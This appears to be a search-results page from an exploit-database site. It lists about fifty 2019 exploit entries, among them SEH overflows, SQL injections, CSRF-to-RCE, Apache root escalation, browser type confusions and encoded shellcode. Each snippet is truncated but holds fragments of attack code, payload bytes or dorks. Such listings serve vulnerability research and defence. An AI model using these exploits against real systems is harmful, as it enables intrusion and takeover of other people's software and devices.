39001 matches found
Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow Date: 2019-04-05 Vendor Homepage: http://www.speedbit.com/dap/ Software Link: http://www.speedbit.com/dap/download/downloading.asp Exploit Author:...
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Shoretel Connect Multiple Vulnerability Google Dork: inurl:/signin.php?ret= Author: Ramikan Vendor Homepage: https://www.shoretel.com/ Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview...
TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow Exploit
Author Grzegorz Wypych - h0rac TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit import requests import md5 import base64 import string import struct import socket password = md5.new'admin'.hexdigest cookie = base64.b64encode'admin:'+password print '+ Authorization cookie: ', cook...
Linux/x64 - XANAX Encoder Shellcode (127 bytes)
Linux/x64 - XANAX Encoder Shellcode 127 bytes ; Date: 08/04/2019 ; XANAX Encoder ; Author: Alan Vivona ; Description: Uses xor-add-not-add-xor sequence with a 4 byte key and writes the encoded version to stdout ; Tested on: x86-x64 GNU/Linux global start segment .data keys.xor1 equ 0x29 keys.add1...
Jobgator - experience SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: NCrypted Jobgator - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.ncrypted.net/jobgator/ Demo Site: https://demo.ncryptedprojects.com/jobgator/ Version: Lastest Tested on: Kali Linux CVE: N/A -----...
ManageEngine ServiceDesk Plus 9.3 - User Enumeration Vulnerability
Exploit for php platform in category web applications Exploit Title: ManageEngine ServiceDesk Plus - 9.3 User enumeration vulnerability Exploit Author: Alexander Bluestein Vendor Homepage: https://www.manageengine.com/ Software Link: https://www.manageengine.com/products/service-desk/download.htm...
Ashop Shopping Cart Software - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Ashop Shopping Cart Software - SQL Injection Exploit Author: Doğukan Karaciğer Vendor Homepage: http://www.ashopsoftware.com Software Link: https://sourceforge.net/projects/ashop/ Demo Site: http://demo.ashopsoftware.com/ Versio...
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution Exploit
Exploit for php platform in category web applications history.pushState'', '', '/' function exploit var target = "http://127.0.0.1" var boltadminurl = target + "/bolt"; var xhr = new XMLHttpRequest; xhr.open"POST", boltadminurl + "/upload", true; xhr.setRequestHeader"Accept", "application/json,...
WordPress Limit Login Attempts Reloaded 2.7.4 Bypass Exploit
WordPress Limit Login Attempts Reloaded plugin version 2.7.4 suffers from a login limit bypass vulnerability. !/usr/bin/env node const request = require"request" / Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass Date: 2019-04-08 Exploit Author: isdampe Software Link:...
QNAP Netatalk < 3.1.12 - Authentication Bypass Exploit
Exploit Title: QNAP Netatalk Authentication Bypass Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link: https://sourceforge.net/projects/netatalk/files/ Version: Before 3.1.12 CVE : CVE-2018-1160...
Apache 2.4.17 < 2.4.38 - apache2ctl graceful (logrotate) Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits ?php CARPE DIEM: CVE-2019-0211 Apache Root Privilege Escalation Charles Fol @cfreal INFOS https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html USAGE 1. Upload exploit to Apache HTTP server 2. Send request to page 3. Await...
Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation Exploit
Exploit for windows platform in category web applications !/usr/bin/python Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking Exploit Author: Ata Hakçıl, Melih Kaan Yıldız Vendor: ManageEngine Vendor Homepage: www.manageengine.com Product: Service Desk Plus...
WordPress Contact Form Maker 1.13.1 Cross Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Contact Form by WD CSRF → LFI Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/contact-form-maker Version: 1.13.1 Tested on: WordPress 5.1.1 Description...
Lupusec XT2 Plus Main Panel Shared Secrets / Secret Disclosure / CSRF Vulnerabilities
Lupusec XT2 Plus Main Panel with firmware 0.0.2.19E suffers from shared private keys for SSL certificates, root passwords derived from the MAC address, information disclosure, and cross site request forgery vulnerabilities. =======================================================================...
WordPress Form Maker 1.13.2 Cross Site Request Forgery / Local File Inclusion Vulnerabilities
WordPress Form Maker plugin version 1.13.2 suffers from cross site request forgery and local file inclusion vulnerabilities. Title: Form Maker by WD CSRF / LFI Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/form-maker Versio...
WordPress 5.0.0 crop-image Shell Upload Exploit
This Metasploit module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and versions below or equal to 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the...
AIDA64 Engineer 5.99.4900 - Load from file Field Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow SEH Exploit Author: Anurag Srivastava and Vardan Bansal Website: www.theanuragsrivastava.in Vulnerable Software: AIDA64 Engineer Vendor...
Magic ISO Maker 5.5(build 281) - Serial Code Denial of Service Exploit
-- coding: utf-8 -- Exploit Title: Magic Iso Maker 5.5build 281 - "Serial Code" Denial of Service PoC Author: Alejandra Sánchez Vendor Homepage: http://www.magiciso.com Software Link: http://www.magiciso.com/SetupMagicISO.exe Version: 5.5build 281 Tested on: Windows 10 Proof of Concept: 1.- Run t...
FreeSMS 2.1.2 - SQL Injection (Authentication Bypass) Vulnerability
Exploit for php platform in category web applications Exploit Title: FreeSMS 2.1.2 - Authentication Bypass Exploit Author: Yilmaz Degirmenci Vendor Homepage: https://freesms.sourceforge.io/ Software Link: https://sourceforge.net/projects/freesms/ Version: v2.1.2 Category: Webapps Tested on: LAMPP...
Clinic Pro v4 - month SQL Injection Vulnerability
Exploit for php platform in category web applications Title: Clinic Pro - Clinic Management Software Exploit Author: Abdullah Çelebi Vendor Homepage: https://softwebinternational.com Software Link: https://cms.softwebinternational.com Category: Webapps Tested on: WAMPP @Win Software description: ...
WebKitGTK+ - ThreadedCompositor Race Condition Exploit
@keyframes foo 0% opacity: 0; 100% opacity: 1; div animation-name: foo; animation-duration: 1s; animation-iteration-count: infinite; filter: saturate50%; frame = document.createElement"iframe"; setInterval = frame.remove; document.body.appendChildframe; doc = frame.contentDocument;...
Ashop Shopping Cart Software - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Ashop Shopping Cart Software - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: http://www.ashopsoftware.com Software Link: https://sourceforge.net/projects/ashop/ Demo Site: http://demo.ashopsoftware.com/ Versio...
SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)
SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types Type Confusion A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects. Prerequisites In...
PhreeBooks ERP 5.2.3 - Remote Command Execution Exploit
Exploit for php platform in category web applications Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://www.phreesoft.com/ Software Link: https://sourceforge.net/projects/phreebooks/ Version: v5.2.3 Category:...
Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - ReadableStream Internal Object Leak Type Confusi
Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - ReadableStream Internal Object Leak Type Confusion binding // These values are only used when serialization is enabled. if !RuntimeEnabledFeatures::TransferableStreamsEnabled return; v8::Local global = scriptstate-GetContext-Global; v8::Local...
iOS < 12.2 / macOS < 10.14.4 XNU - pidversion Increment During execve is Unsafe Exploit
iOS 12.2 / macOS 10.14.4 XNU - pidversion Increment During execve is Unsafe Exploit Privileged IPC services in userspace often have to verify the security context of their client processes such as whether the client is sandboxed, has a specific entitlement, or is signed by some code signing...
iScripts ReserveLogic - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: iScripts ReserveLogic - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.iscripts.com/reservelogic/ Demo Site: https://www.demo.iscripts.com/reservelogic/demo/ Version: Lastest Tested on: Kali Linux...
TeemIp IPAM < 2.4.0 - new_config Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "TeemIp IPAM %q This module exploits a command injection vulnerability in TeemIp versions prior to 2.4.0. The "newconfig" parameter of "exec.php"...
Google Chrome 72.0.3626.81 - V8TrustedTypePolicyOptions::ToImpl Type Confusion Exploit
Google Chrome 72.0.3626.81 - V8TrustedTypePolicyOptions::ToImpl Type Confusion Exploit VULNERABILITY DETAILS The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the the TrustedTypePolicyOptions dictionary:...
Google Chrome 72.0.3626.96 / 74.0.3702.0 - JSPromise::TriggerPromiseReactions Type Confusion
JSPromise::TriggerPromiseReactionsIsolate isolate, Handle reactions, Handle argument, PromiseReaction::Type type DCHECKreactions-IsSmi || reactions-IsPromiseReaction; // We need to reverse the reactions here, since we record them // on the JSPromise in the reverse order. DisallowHeapAllocation...
WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Exploit
WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check / While fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release...
PhreeBooks ERP 5.2.3 - Arbitrary File Upload Exploit
Exploit for php platform in category web applications PhreeBooks ERP v5.2.3 - Arbitrary File Upload Exploit Author: Abdullah Çelebi Vendor Homepage: https://www.phreesoft.com/ Software Link: https://sourceforge.net/projects/phreebooks/files/latest/download Category: Webapps Version: 5.2.3 Tested...
WebKit JavaScriptCore - createRegExpMatchesArray Type Confusion Exploit
/ Prerequisites ------------- In JavaScriptCore, JSObjects have an associated Structure: an object describing various aspects of the JSObject such as its type, its properties, and the type of elements being stored e.g. unboxed double or JSValues. Whenever a property is added to an object or some...
WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free Exploit
WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free Exploit / While fuzzing JavaScriptCore, I encountered the following simplified and commented JavaScript program which crashes jsc from current HEAD and release: / function v9 // Some watchpoint on the LexicalEnvironment is...
Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting Exploit Author: Mr Winst0n Author E-mail: email protected Vendor Homepage: https://www.phpscriptsmall.com Software Link :...
Inout RealEstate - city SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Inout RealEstate - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.inoutscripts.com/products/inout-realestate/ Demo Site: http://inout-realestate.demo.inoutscripts.net/ Version: Lastest Tested on: Ka...
AIDA64 Extreme / Engineer / Network Audit 5.99.4900 - SEH Buffer Overflow (EggHunter) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Extreme 5.99.4900 - SEH Buffer Overflow EggHunter Date: 2019-04-01 Vendor Homepage: https://www.aida64.com Software Link: http://download.aida64.com/aida64extreme599.exe Mirror Link :...
AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow EggHunter Vendor Homepage: https://www.aida64.com Software Link: http://download.aida64.com/aida64extreme599.exe Mirror Link :...
JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings aka a SetWiFiSetting request to cgi-bin/qcmapwebcgi Exploit Author: Vikas Chaudhary Vendor Homepage: https://www.jio.com/...
phpFileManager 1.7.8 - Local File Inclusion Exploit
Exploit for php platform in category web applications Exploit Title: phpFileManager 1.7.8 - Local File Inclusion Exploit Author: Murat Kalafatoglu Vendor Homepage: https://sourceforge.net/projects/phpfm/ Software Demo: https://phpfm-demo.000webhostapp.com/ Version: v1.7.8 Category: Webapps Tested...
CMS Made Simple < 2.2.10 - SQL Injection Exploit
Exploit for php platform in category web applications !/usr/bin/env python Exploit Title: Unauthenticated SQL Injection on CMS Made Simple = 2.2.9 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link:...
WordPress PayPal Checkout Payment Gateway 1.6.8 Plugin - Parameter Tampering Vulnerability
Exploit for php platform in category web applications WordPress PayPal Checkout Payment Gateway 1.6.8 Plugin - Parameter Tampering Exploit Title: cgi-bin/webscr?cmd=cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows Parameter Tampering in an amount parameter...
Inout EasyRooms - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/ Demo Site: http://inout-easyrooms.demo.inoutscripts.net/ Version: v1.0...
AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow Vendor Homepage: https://www.aida64.com Software Link: http://download.aida64.com/aida64extreme599.exe Mirror Link :...
LimeSurvey < 3.16 - Remote Code Execution Exploit
Exploit for php platform in category web applications !/usr/bin/python Description: LimeSurvey shell.php" -p phar -o /tmp/exploit.jpg PHAR = "\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"...
Fiverr Clone Script 1.2.2 Cross Site Scripting / SQL Injection Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting Exploit Author: Mr Winst0n Author E-mail: email protected Discovery Date: Apr 1, 2019 Vendor Homepage: https://www.phpscriptsmall.com Software Link :...
Classified Ad Lister 2.0 Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload Exploit Author: Mehmet EMIROGLU Vendor Homepage:...
Chrome V8TrustedTypePolicyOptions::ToImpl Type Confusion Vulnerability
Chrome: Type confusion in V8TrustedTypePolicyOptions::ToImpl VULNERABILITY DETAILS The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the the TrustedTypePolicyOptions dictionary:...
SphereFTP 2.0 Denial Of Service Exploit
!/usr/bin/python Exploit Title: SphereFTP Server v2.0 Remote Denial of Service Vulnerability Exploit Author: Sachin Wagh @tigertigerboy Software Link: http://www.menasoft.com/sphereftp/sphereftpwin32v20.zip Tested on: Windows 10 64-bit import socket import sys evil = "A"3000...
Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)
/ ; XOR-Encoder.py ; Author: Daniele Votta ; Description: This program encode shellcode with XOR technique. ; Tested on: i686 GNU/Linux ; Shellcode Length:25 !/usr/bin/python Python XOR Encoder Execve /bin/sh shellcode...